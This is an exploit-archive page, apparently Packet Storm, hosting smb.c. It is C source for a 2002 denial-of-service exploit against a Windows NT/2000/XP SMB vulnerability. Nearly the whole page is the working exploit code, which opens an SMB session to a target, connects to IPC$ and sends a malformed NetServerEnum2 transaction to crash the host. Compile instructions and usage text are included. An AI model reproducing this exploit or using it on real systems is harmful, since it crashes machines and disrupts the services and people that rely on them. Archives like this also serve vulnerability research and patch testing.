exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

smb.c

smb.c
Posted Aug 31, 2002
Authored by Matt Miller | Site uninformed.org

Denial of service exploit for Core ST's recently discovered Windows SMB vulnerability which works against Windows NT/2k/XP.

tags | exploit, denial of service
systems | windows
SHA-256 | e15996cb0517207f90b82190146c6c98da17a98d4c7fcd481f0f963988811a36

smb.c

Change Mirror Download
/*
* potential dos for core st's 'Vulnerability report for Windows SMB DoS'.
* thanks to Alberto Solino for further insight. smbclient does a good job of giving you
* packets which aren't exactly the ones you need.
*
* gcc -Wall -O3 smb.c -o smb
*
* uninformed research (http://www.uninformed.org)
*
* skape
* mmiller@hick.org
* 8/23/2002
*/

#include <stdlib.h>
#include <stdio.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <ctype.h>
#include <netdb.h>
#include <unistd.h>

typedef struct _netbios_header {

unsigned char type;
unsigned char flags;

unsigned short length;

} NETBIOS_HEADER;

typedef struct _smb_header {

unsigned char protocol[4];
unsigned char command;

unsigned short status;
unsigned char reserved;

unsigned char flags;
unsigned short flags2;

unsigned char pad[12];

unsigned short tid;
unsigned short pid;
unsigned short uid;
unsigned short mid;

} SMB_HEADER;

void smbInitialize();
int smbConnectSMBServer(unsigned long ipaddr, unsigned int port);
short smbSendReceivePacket(int fd, unsigned char *packet, unsigned int packetLength, short checkSuccess);
short smbPktSendSessionRequest(int fd, const char *remoteMachine, const char *localMachine);
short smbPktSendNegotiateProtocol(int fd);
short smbPktSendSessionSetupX(int fd);
short smbPktSendConX(int fd, const char *remoteMachine);
short smbPktSendEvilNetServerEnum2(int fd);
void smbGetNetbiosName(char *netbiosName, const char *name);

const char *dialects[] = {
"\002JEFUS CREST SUPERIOR PROTOCOL 1.0",
"\002PC NETWORK PROGRAM 1.0",
"\002MICROSOFT NETWORKS 1.03",
"\002MICROSOFT NETWORKS 3.0",
"\002LANMAN1.0",
"\002LM1.2X002",
"\002Samba",
"\002NT LANMAN 1.0",
"\002NT LM 0.12"
};

unsigned short dialectSize = 0;

int main(int argc, char **argv)
{
char *targetMachineName = NULL, *localMachineName = "JEFUS";
unsigned short targetMachinePort = 0;
unsigned long targetMachine = -1;
int c, fd, x;

if (argc == 1)
{
fprintf(stdout,"Usage: %s -t target_smb_name -i ip -p port -l local_machine_name\n", argv[0]);

return 0;
}

smbInitialize();

while ((c = getopt(argc, argv, "t:i:p:l:h")) != EOF)
{
switch (c)
{
case 't':
targetMachineName = optarg;
break;
case 'i':
targetMachine = inet_addr(optarg);
break;
case 'p':
targetMachinePort = atoi(optarg) & 0xFFFF;
break;
case 'l':
localMachineName = optarg;
break;
case 'h':
fprintf(stdout,"Usage: %s -t target_smb_name -i ip -p port -l local_machine_name\n", argv[0]);
return 0;
}
}

if ((!targetMachineName) || (targetMachine == -1) || (targetMachinePort <= 0))
return (int)fprintf(stdout,"invalid target host/port.\n");

for (x = 0; x < strlen(targetMachineName); x++)
targetMachineName[x] = toupper(targetMachineName[x]);

if ((fd = smbConnectSMBServer(targetMachine, targetMachinePort)) <= 0)
return (int)fprintf(stdout,"connection failed.\n");

if ((targetMachinePort == 139) && (!smbPktSendSessionRequest(fd, targetMachineName, localMachineName)))
return (int)fprintf(stdout,"session req failed.\n");

if (!smbPktSendNegotiateProtocol(fd))
return (int)fprintf(stdout,"neg prot failed.\n");

if (!smbPktSendSessionSetupX(fd))
return (int)fprintf(stdout,"session setup failed.\n");

if (!smbPktSendConX(fd, targetMachineName))
return (int)fprintf(stdout,"conx failed.\n");

fprintf(stdout,"sending evil.\n");

if (smbPktSendEvilNetServerEnum2(fd))
return (int)fprintf(stdout,"we failed to be evil.\n");

fprintf(stdout,"we're evil.\n");

return 0;
}

void smbInitialize()
{
int x, dialectItems = sizeof(dialects) / 4;

for (x = 0;
x < dialectItems;
x++)
dialectSize += strlen(dialects[x]) + 1;
}

int smbConnectSMBServer(unsigned long ipaddr, unsigned int port)
{
struct sockaddr_in s;
int fd = 0;

if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) <= 0)
{
perror("socket");
return 0;
}

s.sin_family = AF_INET;
s.sin_port = htons(port);
s.sin_addr.s_addr = ipaddr;

if (connect(fd, (struct sockaddr *)&s, sizeof(s)) < 0)
{
perror("connect");
close(fd);
return 0;
}

return fd;
}

short smbSendReceivePacket(int fd, unsigned char *packet, unsigned int packetLength, short checkSuccess)
{
unsigned char *recvPacket = NULL;
unsigned short ret = 0, realLength;
NETBIOS_HEADER netbiosHeader;
struct timeval tv;
fd_set fdread;

write(fd, packet, packetLength);

FD_ZERO(&fdread);
FD_SET(fd, &fdread);

tv.tv_sec = 5;
tv.tv_usec = 0;

if (!select(fd + 1, &fdread, NULL, NULL, &tv))
return 0;

if (!read(fd, &netbiosHeader, 4))
return 0;

realLength = ntohs(netbiosHeader.length);

if (realLength && checkSuccess)
{
recvPacket = (unsigned char *)malloc(realLength);
read(fd, recvPacket, realLength);

if (((unsigned char *)&((SMB_HEADER *)recvPacket)->status)[0] == 0x00)
ret = 1;

free(recvPacket);
}
else if (!checkSuccess)
ret = 1;

return ret;
}

void smbGetNetbiosName(char *netbiosName, const char *name)
{
int x = 0, len = strlen(name);
char *nbName = netbiosName;
char temp[2];

memset(netbiosName, 0, 32);

for (; x < 16; x++)
{
if (x >= len)
memcpy(temp, "CA", 2);
else
{
temp[0] = name[x] / 16 + 0x41;
temp[1] = name[x] % 16 + 0x41;
}

memcpy(nbName, temp, 2);

nbName += 2;
}

return;
}

short smbPktSendSessionRequest(int fd, const char *remoteMachine, const char *localMachine)
{
unsigned char packet[sizeof(NETBIOS_HEADER) + 34 + 34];
NETBIOS_HEADER *netbiosHeader = (NETBIOS_HEADER *)packet;
char *calledName = (char *)packet + sizeof(NETBIOS_HEADER);
char *callingName = (char *)packet + sizeof(NETBIOS_HEADER) + 34;

memset(packet, 0, sizeof(packet));

netbiosHeader->type = 0x81; /* Session Request */
netbiosHeader->length = htons(72);

calledName[0] = 0x20;
smbGetNetbiosName(calledName + 1, remoteMachine);
callingName[0] = 0x20;
smbGetNetbiosName(callingName + 1, localMachine);

return smbSendReceivePacket(fd, packet, sizeof(packet), 0);
}

short smbPktSendNegotiateProtocol(int fd)
{
unsigned char packet[sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + 3 + dialectSize];
NETBIOS_HEADER *netbiosHeader = (NETBIOS_HEADER *)packet;
SMB_HEADER *smbHeader = (SMB_HEADER *)((unsigned char *)packet + sizeof(NETBIOS_HEADER));
unsigned short *byteCount = (unsigned short *)((unsigned char *)packet + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + 1);
unsigned char *dialectOffset = packet + 3 + sizeof(SMB_HEADER) + sizeof(NETBIOS_HEADER);
int x, dialectItems = sizeof(dialects) / 4, len;

memset(packet, 0, sizeof(packet));

netbiosHeader->type = 0x00;
netbiosHeader->length = htons(sizeof(packet) - 4);

memcpy(smbHeader->protocol,"\xFFSMB", 4);
smbHeader->command = 0x72; /* SMBnegprot */
smbHeader->flags = 0x08; /* caseless pathnames */
smbHeader->flags2 = 0x01; /* long filenames supported */
smbHeader->pid = getpid() & 0xFFFF;
smbHeader->mid = 0x01;
*byteCount = dialectSize;

for (x = 0;
x < dialectItems;
x++)
{
memcpy(dialectOffset, dialects[x], (len = strlen(dialects[x]) + 1));

dialectOffset += len;
}

return smbSendReceivePacket(fd, packet, sizeof(packet), 1);
}

short smbPktSendSessionSetupX(int fd)
{
unsigned char *domain = "JEFUS", *os = "JEFOS";
unsigned short domainLength = strlen(domain) + 1, osLength = strlen(os) + 1;
unsigned char packet[sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + 32 + domainLength + osLength];
NETBIOS_HEADER *netbiosHeader = (NETBIOS_HEADER *)packet;
SMB_HEADER *smbHeader = (SMB_HEADER *)((unsigned char *)packet + sizeof(NETBIOS_HEADER));
unsigned char *payloadPtr = packet + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER);

memset(packet, 0, sizeof(packet));

netbiosHeader->length = htons(sizeof(packet) - 4);

memcpy(smbHeader->protocol,"\xFFSMB", 4);
smbHeader->command = 0x73; /* SMBsesssetupX */
smbHeader->flags = 0x08; /* caseless pathnames */
smbHeader->flags2 = 0x01; /* long filenames supported */
smbHeader->pid = getpid() & 0xFFFF;
smbHeader->mid = 0x01;

*payloadPtr++ = 0x0D; /* 13 words */
*payloadPtr++ = 0xFF; /* No other commands */
payloadPtr += 3;
*payloadPtr++ = 0xFF; /* first bit of max buf size */
*payloadPtr++ = 0xFF; /* second bit of max buf size */
*payloadPtr++ = 0x02; /* first bit of max mpx count */
*payloadPtr++ = 0x00;
*payloadPtr++ = 0x1D; /* first bit of vc number */
*payloadPtr++ = 0x7E;
payloadPtr += 12;
*payloadPtr = 0x10; /* 0x0010 for capabilities. */
payloadPtr += 4;
*payloadPtr = domainLength + osLength + 3;
payloadPtr += 4;
memcpy(payloadPtr, domain, domainLength);
payloadPtr += domainLength;
memcpy(payloadPtr, os, osLength);
payloadPtr += osLength;

return smbSendReceivePacket(fd, packet, sizeof(packet), 1);
}

short smbPktSendConX(int fd, const char *remoteMachine)
{
unsigned short remoteMachineLength = strlen(remoteMachine);
unsigned char packet[sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + 15 + remoteMachineLength + 9];
NETBIOS_HEADER *netbiosHeader = (NETBIOS_HEADER *)packet;
SMB_HEADER *smbHeader = (SMB_HEADER *)((unsigned char *)packet + sizeof(NETBIOS_HEADER));
unsigned char *payloadPtr = packet + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER);

memset(packet, 0, sizeof(packet));

netbiosHeader->length = htons(sizeof(packet) - 4);
memcpy(smbHeader->protocol,"\xFFSMB", 4);
smbHeader->command = 0x75; /* SMBconX */
smbHeader->flags = 0x08; /* caseless pathnames */
smbHeader->flags2 = 0x01; /* long filenames supported */
smbHeader->pid = getpid() & 0xFFFF;
smbHeader->uid = 2048;
smbHeader->mid = 0x01;

*payloadPtr++ = 0x04; /* word count of 4 */
*payloadPtr++ = 0xFF; /* no further commands */
payloadPtr += 5; /* skip reserved zero's */
*payloadPtr = 0x01; /* set password length to 1 for '\0' */
payloadPtr += 2;
*payloadPtr++ = (remoteMachineLength + 13) & 0xFF; /* set byte count to remote machine length + 13 */
*payloadPtr++ = 0;
payloadPtr++;
memcpy(payloadPtr, "\\\\", 2);
payloadPtr += 2;
memcpy(payloadPtr, remoteMachine, remoteMachineLength);
payloadPtr += remoteMachineLength;
memcpy(payloadPtr, "\\IPC$", 6); /* copy null */
payloadPtr += 6;
memcpy(payloadPtr, "IPC", 4); /* copy null */

return smbSendReceivePacket(fd, packet, sizeof(packet), 1);
}

short smbPktSendEvilNetServerEnum2(int fd)
{
unsigned char packet[99];
NETBIOS_HEADER *netbiosHeader = (NETBIOS_HEADER *)packet;
SMB_HEADER *smbHeader = (SMB_HEADER *)((unsigned char *)packet + sizeof(NETBIOS_HEADER));
unsigned char *payload = packet + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER);

memset(packet, 0, sizeof(packet));

netbiosHeader->type = 0x00;
netbiosHeader->length = htons(sizeof(packet) - 4);

memcpy(smbHeader->protocol,"\xFFSMB", 4);
smbHeader->command = 0x25; /* SMBTrans */
smbHeader->flags = 0x00; /* caseless pathnames */
smbHeader->flags2 = 0x01; /* long filenames supported */
smbHeader->pid = getpid() & 0xFFFF;
smbHeader->mid = 0x00;
smbHeader->uid = 2048;
smbHeader->tid = 2048;

*payload++ = 0x0E; /* wc 14 */
*((unsigned short *)payload) = htons(0x1300); /* param count */
payload += 2;
*((unsigned short *)payload) = htons(0x0000); /* data count */
payload += 2;
*((unsigned short *)payload) = htons(0x0000); /* max param count (bug here) was 0x0800*/
payload += 2;
*((unsigned short *)payload) = htons(0x0000); /* max data count (bug here 2) was 0xFFFF*/
payload += 12; /* skip count, reserve, flags, ret ime, reserve */
*((unsigned short *)payload) = htons(0x1300); /* param count */
payload += 2;
*((unsigned short *)payload) = htons(0x4C00); /* param count offset */
payload += 4; /* skip data count which is 0 */
*((unsigned short *)payload) = htons(0x5F00); /* data count offset */
payload += 4; /* skip setup count, reserve */
*((unsigned short *)payload) = htons(0x2000); /* byte count */
payload += 2;
memcpy(payload, "\\PIPE\\LANMAN", 13);
payload += 13;

/* lanman portion */

*((unsigned short *)payload) = htons(0x6800); /* NetServerEnum2 */
payload += 2;
*((unsigned long *)payload) = htonl(0x57724C65); /* param desc 1 */
payload += 4;
*((unsigned short *)payload) = htons(0x6800); /* param desc 2 */
payload += 2;
*((unsigned long *)payload) = htonl(0x42313342); /* ret desc 1 */
payload += 4;
*((unsigned short *)payload) = htons(0x577A); /* ret desc 2 */
payload += 2;
*payload++ = 0x00; /* ret desc 3 */
*((unsigned short *)payload) = htons(0x0100); /* detail */
payload += 2;
*((unsigned short *)payload) = htons(0xE0FF); /* recv len */

return smbSendReceivePacket(fd, packet, sizeof(packet), 1);
}
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close